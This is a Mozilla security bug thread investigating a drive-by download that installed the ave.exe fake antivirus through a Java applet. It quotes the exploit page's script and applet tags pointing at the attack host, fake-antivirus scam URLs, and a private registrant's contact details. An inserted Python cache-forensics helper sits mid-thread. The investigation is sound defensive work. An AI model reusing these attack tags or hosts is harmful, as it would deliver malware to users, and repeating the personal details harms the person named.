Closed Bug 561807 Opened 15 years ago Closed 1 year ago

journaldelasquare.com/news drive-by download and installation of ave.exe and other malware

Categories

(Firefox :: Security, defect)

x86_64
Windows Vista
defect


RESOLVED INCOMPLETE

People

(Reporter: cooldued17, Unassigned)

References

(Blocks 1 open bug)

Details

(Keywords: sec-vector, Whiteboard: [sg:vector-critical (Java)?][chofmann reproduced, will try again with newer Java])

Attachments

(14 files)

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)

While browsing Google, I clicked on a link which brought me to the page linked, after which the file "ave.exe" was downloaded and run, then Firefox crashed.

Reproducible: Didn't try

Steps to Reproduce:
1. Visit URL
My antivirus is AVG FREE 9.0.814
Attachment #441536 - Attachment mime type: text/html → text/plain
Brett, did the Mozilla crash reporter show up? Can you check about:crashes for the crash report ID?
ave.exe is also known as av.exe and Trojan FakeRean. We have also seen a few instances of [obfuscated_name]ave.dll crashes in the crash data of the last month. The interesting part of this is how the download got kicked off automatically, and then launched. Brett, do you have anything set on your system that would kick off automatic downloads or stop the normal prompts to save the file and/or launch it?

Here are the other reports for ave.dll crashes

20100412-crashdata.csv:kemifave.dll@0x114ba [porn site removed] http://crash-stats.mozilla.com/report/index/e33a655b-8507-4977-8869-a393b2100412 Firefox 3.6.3 Flash \N
20100413-crashdata.csv:olemyave.dll@0x43460 http://images.google.de/imgres?imgurl=http://tribeheaven.co.uk/cast/wp-content/uploads/2009/07/Tom-Hern-and-James-Napier-Robertson-Im-Not-Harry-Jenson-Interview-The-Tribe-Ram-and-Jay.jpg&imgrefurl=http://tribeheaven.co.uk/cast/2009/07/21/im-not-harry-jens http://crash-stats.mozilla.com/report/index/a55ab1fa-fa74-4d26-8476-207b92100413 Firefox 3.6 Flash \N
20100416-crashdata.csv:olemyave.dll@0x43460 http://www.zwigge.de/privmsg.un?folder=inbox http://crash-stats.mozilla.com/report/index/7f9e93d3-e426-4258-bf67-ffe992100416 Firefox 3.6 Flash 10.0.45.2
20100416-crashdata.csv:olewave.dll@0x2bbca about:blank http://crash-stats.mozilla.com/report/index/0ffac14e-de60-45a2-b208-b10e12100416 Firefox 3.6.3 Flash 10.0.12.36
20100416-crashdata.csv:olemyave.dll@0x43460 http://www.zwigge.de/album_page.un?pic_id=3093333&mode=next http://crash-stats.mozilla.com/report/index/cca79063-af6e-4c70-b748-13a892100416 Firefox 3.6 Flash 10.0.45.2

Also some reports where users mention being hacked by ave.exe or searching for instructions to repair.

20100401-crashdata.csv:UserCallWinProcCheckWow http://bleacherreport.com/articles/371546-josh-mcdaniels-the-greatest-ally-of-the-afc-west http://crash-stats.mozilla.com/report/index/d53c0ebd-94e0-403b-97fd-038692100401 Firefox 3.6.2 Flash "I just got hacked by that ""ave.exe"" panicware. this is the second time in two weeks that you're product missed this malware and allowed an attack. i may need to switch to something more reliable unless you can come up with a solution."
20100402-crashdata.csv:nsGlobalWindow::cycleCollection::UnmarkPurple(nsISupports*) http://www.istanto.net/how-to-remove-ave-exe-fake-antispyware.html http://crash-stats.mozilla.com/report/index/203bdb09-5c70-4f5c-93cf-8e5932100402 Firefox 3.6.2 Flash \N
20100406-crashdata.csv:nsTreeBodyFrame::GetPseudoStyleContext(nsIAtom*) \N http://crash-stats.mozilla.com/report/index/a9613d21-bc5d-404e-bd83-d81022100406 Firefox 3.6.3 Flash dont worry guys ... its not you its this **** virus I was just hacked with ... the file was called ave.exe ... shows up as vista antimaleware 2010 ... bunch of lame hackers ! now I need to reinstall everything on my pc !!!
20100407-crashdata.csv:ntload.dll@0x40f7 http://www.malwarehelp.org/ave-exe-a-multiple-rogues-in-one-trojan-fakerean-2010.html http://crash-stats.mozilla.com/report/index/6130c85a-4392-4747-bb41-b45042100407 Firefox 3.6.3 Flash \N
20100408-crashdata.csv:_PR_MD_SEND http://crash-stats.mozilla.com/report/index/754e6ec0-723c-4054-bb8d-65d902100408 Firefox 3.6 Flash \N just contracted the ave.exe virus
20100413-crashdata.csv:nsPluginHost::InstantiateFullPagePlugin(char const*, nsIURI*, nsIStreamListener*&, nsIPluginInstanceOwner*) http://www.google.com/search?hl=en&client=firefox-a&hs=4EB&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&q=ave.exe+removal&aq=f&aqi=g1&aql=&oq=&gs_rfai= http://crash-stats.mozilla.com/report/index/26534a5e-63a2-402f-a085-b74ca2100413 Firefox 3.6.3 Flash \N \N
20100413-crashdata.csv:shlwapi.dll@0x2c4d8 http://scifi.com/ http://crash-stats.mozilla.com/report/index/80be9c7e-f040-4216-ae86-4a6ae2100413 Firefox 3.6.3 Flash \N Been having problems with Mozilla since upgrading. I found an unauthorized add-on which may be causing problems even though I disabled it (will not allow itself to be uninstalled). Occasionally get redirected to other sites. When enabled this add-on allows a virus to load (ave.exe). I will now have to uninstall Mozilla then reinstall to stop this and clean out the add-ons. My Norton AV says hard drive is clean of viruses.
20100414-crashdata.csv:__from_strstr_to_strchr http://rds.yahoo.com/_ylt=A0geu7y3IcZLMFwACj9XNyoA;_ylu=X3oDMTEzZDFoYXVmBHNlYwNzcgRwb3MDMQRjb2xvA2FjMgR2dGlkA0g1NDlfMTQ3/SIG=1224sn963/EXP=1271362359/**http%3a//www.spyware-fix.net/remove-ave-exe.html http://crash-stats.mozilla.com/report/index/67d27067-4647-4694-a90e-5a8da2100414 Firefox 3.6.3 Flash \N \N
20100414-crashdata.csv:StrChrIA http://www.google.ca/url?sa=t&source=web&ct=res&cd=1&ved=0CAYQFjAA&url=http%3A%2F%2Fwww.malwarehelp.org%2Fave-exe-a-multiple-rogues-in-one-trojan-fakerean-2010.html&ei=FLHGS5bwCYG6NZCRhO0I&usg=AFQjCNHe904naB2FO-DO32TmnwrmO6TuPQ http://crash-stats.mozilla.com/report/index/ac14e7ec-75bb-4730-8dac-d6dbf2100414 Firefox 3.6.3 Flash \N \N
20100423-crashdata.csv:nsCOMPtr<nsIXBLDocumentInfo>::~nsCOMPtr<nsIXBLDocumentInfo>() | PresShell::DoReflow(nsIFrame*, int) http://www.malwarehelp.org/ave-exe-a-multiple-rogues-in-one-trojan-fakerean-2010.html http://crash-stats.mozilla.com/report/index/d1dd6ece-7e58-43d9-8bcc-d25352100423 Firefox 3.6.3 Flash 10.0.45.2 \N
Summary: Upon visiting the given url a virus is downloaded and firefox crashes → Upon visiting the given url ave.exe virus is downloaded and firefox crashes
@Benjamin Smedberg: The crash reporter did not show up. I will check about:crashes when I get back home tonight.

@chris hofmann: I have an addon that adds the download and run option to the file download prompt; however, I'm pretty sure it doesn't work with the latest Firefox and is disabled. I'll check and post all possibly related addons when I get home tonight.
I think I was able to reproduce this on a winXP vm using the test URL.

- hit the link.
- some attempts at pop ups were made.
- firefox disappeared
- no crash dialog shown
- then XP security tools kicked in and started detecting a variety of virus installations.
I tested the bug with Firefox (safe mode) with no add-ons. This time I noticed the Java console popped up in the system tray the moment the page loaded and disappeared at the same time as Firefox did.
And I just checked, I don't have any error logs from when Firefox closed due to the virus.
Attached file exploit.html
DOM->Source of exploit page. Requires Java.
Attached file exploit.js
referenced js file.
it went by quickly, but I think I saw one window that indicated "plugin not found" before firefox exited, so I wonder if there might be multiple paths. XP Security tool 2010 is recommending that I not start firefox until I clean up the system so I'll wait until the morning to clean up and see if I had java installed on that VM.
Status: UNCONFIRMED → NEW
Ever confirmed: true
submitted a request to get the test url blocked by safe browsing. http://badwarebusters.org/community/submit
Calvin, Thomas, and Hao, Is there anyone around on the Java team that can help investigate this?
Chris, Can you clarify which URL to use to reproduce the problem? I downloaded all the attachments. Neither data.html nor exploit.html references the exploit.js and neither one contains applet or embed tag. So I'm not sure how java is involved here.
Calvin, the link in the url field goes to the exploit.

<http://journaldelasquare.com/news/data.html?ID=20344&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002T0RvaU1UVXlNRFV3T0RraU8zTTZNVEk2SW1Ga2RtVnlkR2x6WlY5cFpDSTdjem8yT2lJeE1ESXhNalFpTzNNNk5Eb2lhM0J3YVNJN1RqdDljem96T2lKdFpEVWlPM002TXpJNkltUTVNbUkxWkRBeVpHVTBPVGhpTm1RNE16RXpPRFpoTlRnNE9ERTVOamd4SWp0OQ%3D%3D>

exploit.js was just the name I gave to the script that was referenced in the exploit.html file:

<SCRIPT type = "text/javascript" src = "http://journaldelasquare.com/news/data.html?ID=20344&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002T0RvaU1UVXlNRFV3T0RraU8zTTZNVEk2SW1Ga2RtVnlkR2x6WlY5cFpDSTdjem8yT2lJeE1ESXhNalFpTzNNNk5Eb2lhM0J3YVNJN1RqdDljem96T2lKdFpEVWlPM002TXpJNkltUTVNbUkxWkRBeVpHVTBPVGhpTm1RNE16RXpPRFpoTlRnNE9ERTVOamd4SWp0OQ%3D%3D/t002105X5da00f28Y1675f9feZ07f02419Q00000000901800F0035010aJ00000000L656e2d55530000000000">

exploit.html (which is the translation of the DOM to HTML of the result of loading the first url) does include an applet:

<APPLET width = "2" height = "2" archive = "http://journaldelasquare.com/news/data.html?ID=20344&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002T0RvaU1UVXlNRFV3T0RraU8zTTZNVEk2SW1Ga2RtVnlkR2x6WlY5cFpDSTdjem8yT2lJeE1ESXhNalFpTzNNNk5Eb2lhM0J3YVNJN1RqdDljem96T2lKdFpEVWlPM002TXpJNkltUTVNbUkxWkRBeVpHVTBPVGhpTm1RNE16RXpPRFpoTlRnNE9ERTVOamd4SWp0OQ%3D%3D/s002105303r0409X5da00f26Y1675f9feZ07f02419" code = "Main.class">
<PARAM name = "u" value[...]name = "c" value = "2">
<PARAM name = "d" value = "0">
</APPLET>
Summary: Upon visiting the given url ave.exe virus is downloaded and firefox crashes → journaldelasquare.com/news drive-by download and installation of ave.exe and other malware
Domain Name: journaldelasquare.com
Registrant: chic@qx8.ru
Ekaterina Gilmanova
+7.391660301
Ekaterina Gilmanova
ul.Komsomolskaya d.39 kv.59
Norilsk, Krasnoyarskij kraj, RU 663300

Registrant Search: "Ekaterina Gilmanova" owns about 534 other domains
Email Search: chic@qx8.ru is associated with about 17 domains
Whiteboard: [sg:vector-critical (Java)?][chofmann reproduced, will try again with newer Java]
1.6.0_05 is the version of Java installed on the Windows vm I was testing on in comments 6 and 11.
journaldelasquare.com is unreachable. Ping also fails. Is there other way to reproduce without connecting to that server?
yeah, we can't reach it now either. my guess is that the site has been pulled down and/or migrated to a different location. bc, I wonder if there is a way to try and host the content on a test server somewhere. we would need to put it under auth or other controls.
all this stuff was installed and detected in under a few seconds on my test vm.

xp security tool 2010 detected 28 forms of malware

Email-Worm.JS.Gigger
IM-Worm.Win32.Kevir.k
BWME.Twelve.1378
Devices.2000
IRC-Worm.DOS.Septic
IRC-Worm.DOS.Loa
P2P-Worm.Win32.Duload.a
Happy_II.506
Joke.1068
P2P-Worm.Win32.Franvir
Lemena.3544
Kot.b
EICAR-Test-File
Tojan-Cliker.Win32.Small.k
Trojan-Spy.HTML.Bankfraud.jk
DoS.Win32.DieWara
Exploit.CodeBaseExec
Trojan-Spy,HTML.Bankfraud.pa
Trojan-Proxy.Win32.Agent.x
Email-Worm.VBS.Peach
Virus.Boot-DOS.B.1536
Macro.PPoint.ShapeShift
Backdoor.Perl.AEI.16
Trojan-SMS.J2ME.RedBrowser.a (mobile phones running j2me)
Trojan-Clicker.Win32.Stixo.d

Also received message

Attack from 63.155.148.147 port 11930 Attacked port 13018 IRC-Worm.DOS.Septic
Attacked from 191.106.168.67 port 2714 Attacked port 5112 Threat: Trojan-PSW.Win32.Coced.219
Attacked from 1.244.30.53 port 10840 Attacked port 11950 Threat BWME.Twelve.1378
Attacked from 37.119.177.147 port 4460 Attacked port 4769 Threat Virus.BAT.8Fish
(In reply to comment #19)
> bc, I wonder if there is a way
> to try and host the content on a test server somewhere. we would need to put
> it under auth or other controls.

I should have grabbed the applet when I had the chance I guess. I worry about hosting in bugzilla in runnable form, but as a compressed tar ball or zip file it wouldn't be much of a threat. Would we really need to host it in runnable form somewhere?

(In reply to comment #20)
> xp security tool 2010 detected 28 forms of malware

Isn't xp security tool 2010 a malware itself?
(In reply to comment #20)
> all this stuff was installed and detected in under a few seconds on my test vm.
> xp security tool 2010 detected 28 forms of malware
>

What is the directory path to those malware files?

Can you also check if the applet's Main.class was downloaded?

You can open the java deployment cache viewer by running the following command:

javaws -viewer

Select "Resources" in the pull-down menu.

If the Main.class is there, please save it and attach to this report.
(In reply to comment #21)
> (In reply to comment #19)
>
> > bc, I wonder if there is a way
> > to try and host the content on a test server somewhere. we would need to put
> > it under auth or other controls.
>
> I should have grabbed the applet when I had the chance I guess. I worry about
> hosting in bugzilla in runnable form, but as a compressed tar ball or zip file
> it wouldn't be much of a threat. Would we really need to host it in runnable
> form somewhere?
>

I think if we want to get a better handle on this it would be good to get it posted somewhere.

>
> (In reply to comment #20)
>
> > xp security tool 2010 detected 28 forms of malware
>
> Isn't xp security tool 2010 a malware itself?

yeah, a closer look showed it turned out to be malware as well. I'm running norton and maybe other av full scans to get a better idea of what's installed.

xp security tool 2010 also sent me here to try and get me to update my "expired subscription" -> http://blacksecuritygroup.com/
xp security tool 2010 also sent me here to try and get me to give a credit card. -> http://security-pccare2010.com/?type=3

it's in a loop showing me these warnings

Attacked from 37.119.177.147 port 4460 Attacked port 4769 Threat Virus.BAT.8Fish [click to remove]

then multiple opt in/opt out paths that all lead to these one of many sites that try and get me to buy a subscription.
Attached file this time for sure.
the metasploit items are from some earlier testing so I think it's just the top 7 items in the payload.

Bloodhound.Exploit.166
Trojan.Ducky.B
Backdoor.Trojan
Trojan Horse
Bloodhound.Exploit.169
Bloodhound.Exploit.96
Trojan.Ducky.B
(In reply to comment #22)
> (In reply to comment #20)
> > all this stuff was installed and detected in under a few seconds on my test vm.
> > xp security tool 2010 detected 28 forms of malware
> >
>
> What is the directory path to those malware files?
>
> Can you also check if the applet's Main.class was downloaded?
>
> You can open the java deployment cache viewer by running the following command:
> javaws -viewer
>
> Select "Resources" in the pull-down menu.
>
> If the Main.class is there, please save it and attach to this report.

I believe I have found the jar file containing the main.class but I can't seem to save/extract the file from the java cache viewer. Anyone know how to get it out of the java cache?
Attached image Possible exploit jar
(In reply to comment #32)
> (In reply to comment #22)
> > (In reply to comment #20)
> > > all this stuff was installed and detected in under a few seconds on my test vm.
> > > xp security tool 2010 detected 28 forms of malware
> > >
> >
> > What is the directory path to those malware files?
> >
> > Can you also check if the applet's Main.class was downloaded?
> >
> > You can open the java deployment cache viewer by running the following command:
> > javaws -viewer
> >
> > Select "Resources" in the pull-down menu.
> >
> > If the Main.class is there, please save it and attach to this report.
> I believe I have found the jar file containing the main.class but I can't seem
> to save/extract the file from the java cache viewer. Anyone know how to get it
> out of the java cache?

I don't think you can save it directly from the cache viewer.

If you're using XP, the default java deployment cache location is at:

c:\Documents and Settings\<user name>\Application Data\Sun\Java\Deployment\cache

substitute <user name> above with your user name

there're sub-directories under the cache directory. You'll just need to list the files under the cache directory and its sub-directories and compare the size shown in the java cache viewer to get the right file(s).

Note that the cached file names are randomized and there should be an index file (with .idx suffix) for each cached file. Please save the .idx file too.
> While browsing google, I clicked on a link which brought me to the [test url]

hey brett, I also wonder if you recall the search you performed or the search results that you got, or if any of that is still in your history. Understanding these might help to track down the next place this attack might be hosted now that it's been removed from journaldelasquare.com/news
I also submitted http://security-pccare2010.com/?type=3 and http://blacksecuritygroup.com/ to http://badwarebusters.org/community/submit That's not going to be entirely helpful in this particular attack since these pages were launched in chromeless IE windows, but it might be useful to firefox users that might wander on to the pages from other sources. Still no response back from stop badware folks on any of the requests. we really need to get a better streamlined escalation path with some contacts there. I'll see if others have contacts.
I guess we could submit those two urls to the IE safebrowsing system to help disrupt the flow of the bogus credit card charging/credit card stealing part of this attack, but:

1) I haven't figured out where microsoft takes submissions to their safe browsing feature. anyone have a contact or know where to submit these requests?

2) I think it still won't block the urls on the majority of systems if the attacker is using IE6 to launch the chromeless and regular subscription offer browser windows.
dveditz suggests uploading the applet to http://www.virustotal.com/ and they will scan to find which AV packages can detect it, and which malware packages might use the exploit. I'll try and do that later.
On my system there is C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0 then further subdirectories numbered 1 through 63 along with "host", "muffin", tmp, and a file called last access. all the numbered directories appear to be empty. maybe norton or something else already cleaned these up?
Attached file main.class
Alright I managed to fish the file out of the java cache, and I think* that I had googled "winamp 2 channel to 5.1" when the link came up but I'm not 100% on that since the first time I went to the site is not in my history.
Attached file main.class idx
At some point we should open this bug up to share more of what happened and get more eyes looking at possible defenses. Do we think we are ready to do that now? Is there anything that we would want to hold private?
Also submitted the attack and fake AV urls to http://www.google.com/safebrowsing/report_badware/
(In reply to comment #40)
> Created an attachment (id=442292) [details]
> main.class
>
> Alright I managed to fish the file out of the java cache, and I think* that I
> had googled "winamp 2 channel to 5.1" when the link came up but I'm not 100% on
> that since the first time I went to the site is not in my history.

The above attachment is actually a jar file, its content is:

  created: META-INF/
 inflated: META-INF/MANIFEST.MF
 inflated: ________vload.class
 inflated: vlocal$sc.class
 inflated: vlocal.class
 inflated: vmain.class

I doubted it's the resource for the applet for this bug because the applet references code = "Main.class".

I also decompiled the vmain.class and it references:

String str1 = getParameter("sdata");
String str2 = getParameter("slink");

The applet in question doesn't have the above html parameters set.
Attached file decompiled source code
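The two forensic steps discussed above (comment #32's advice to hunt for the randomized-name cached file plus its .idx sidecar, and comment #41's check of which class and which getParameter() strings the recovered jar carries) can be scripted. The following is an added example, not code from this bug or from Mozilla; it assumes the cache layout the thread describes (<cache>\6.0\<n>\<random-name> with a matching <random-name>.idx), and the sample cache it builds is constructed, with made-up names and a minimal class file rather than anything from the attack.

```python
# Added forensic helper, not code from the bug thread or from Mozilla. Walks a Java
# Deployment cache (assumed layout <cache>/6.0/<n>/<random-name> plus <random-name>.idx,
# as the thread describes), sniffs which randomized-name files are JARs, lists the
# classes inside and pulls string constants from each class (e.g. applet parameter names).
import os, struct, tempfile, zipfile

ZIP_MAGIC, CLASS_MAGIC = b"PK\x03\x04", b"\xca\xfe\xba\xbe"
# constant-pool tag -> whole entry size in bytes (tag 1, Utf8, is variable-length)
CP_SIZE = {3: 5, 4: 5, 5: 9, 6: 9, 7: 3, 8: 3, 9: 5, 10: 5, 11: 5, 12: 5,
           15: 4, 16: 3, 17: 5, 18: 5, 19: 3, 20: 3}

def find_cached_jars(cache_root):
    """One record per JAR under cache_root: name, path, size, idx sidecar, entries."""
    found = []
    for dirpath, _dirs, files in os.walk(cache_root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:            # no extensions: sniff the magic
                if name.endswith(".idx") or fh.read(4) != ZIP_MAGIC:
                    continue
            try:
                with zipfile.ZipFile(full) as zf:
                    entries = zf.namelist()
            except zipfile.BadZipFile:
                continue                            # truncated or corrupt archive
            found.append({"name": name, "path": full, "size": os.path.getsize(full),
                          "idx": full + ".idx" if os.path.isfile(full + ".idx") else None,
                          "entries": entries})
    return found

def class_utf8_strings(data):
    """Walk a .class constant pool and return its CONSTANT_Utf8 entries in order."""
    if data[:4] != CLASS_MAGIC: return []
    count, pos, i, out = struct.unpack(">H", data[8:10])[0], 10, 1, []
    while i < count and pos < len(data):
        tag = data[pos]
        if tag == 1:
            ln = struct.unpack(">H", data[pos + 1:pos + 3])[0]
            out.append(data[pos + 3:pos + 3 + ln].decode("utf-8", "replace"))
            pos += 3 + ln
        elif tag in CP_SIZE:
            pos += CP_SIZE[tag]
            i += tag in (5, 6)                      # long/double occupy two slots
        else:
            break                                   # unknown tag: keep what we have
        i += 1
    return out

def jar_class_strings(jar_path):
    """Map each .class entry in the JAR to the strings in its constant pool."""
    with zipfile.ZipFile(jar_path) as zf:
        return {n: class_utf8_strings(zf.read(n)) for n in zf.namelist() if n.endswith(".class")}

def build_sample_cache():
    """Constructed sample, not real malware: a randomized-name JAR, its .idx, a text file."""
    sub = os.path.join(tempfile.mkdtemp(), "6.0", "12")
    os.makedirs(sub)
    cls = (CLASS_MAGIC + b"\x00\x00\x00\x32\x00\x03"   # version 50, pool count 3
           + b"\x01\x00\x0cgetParameter" + b"\x01\x00\x05sdata")
    jar = os.path.join(sub, "1a2b3c4d-5e6f7a8b")
    with zipfile.ZipFile(jar, "w") as zf:
        zf.writestr("vmain.class", cls)
    open(jar + ".idx", "wb").close()
    open(os.path.join(sub, "notes.txt"), "w").write("not an archive")
    return os.path.dirname(os.path.dirname(sub))
```

Run find_cached_jars() against a real cache copy (the thread's path under Application Data\Sun\Java\Deployment\cache) and compare each record's size with the cache viewer; jar_class_strings() then shows whether the jar names Main.class and which parameters its classes read.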
Keywords: sec-vector
Keywords: sec-other
Group: core-security → firefox-core-security

In the process of migrating remaining bugs to the new severity system, the severity for this bug cannot be automatically determined. Please retriage this bug using the new severity system.

Severity: critical → --

The severity field is not set for this bug.
:serg, could you have a look please?

For more information, please visit BugBot documentation.

Flags: needinfo?(sgalich)

This bug is over a decade old and seems to involve Java, so I think we can close this.

Status: NEW → RESOLVED
Closed: 1 year ago
Flags: needinfo?(sgalich)
Resolution: --- → INCOMPLETE
Group: firefox-core-security
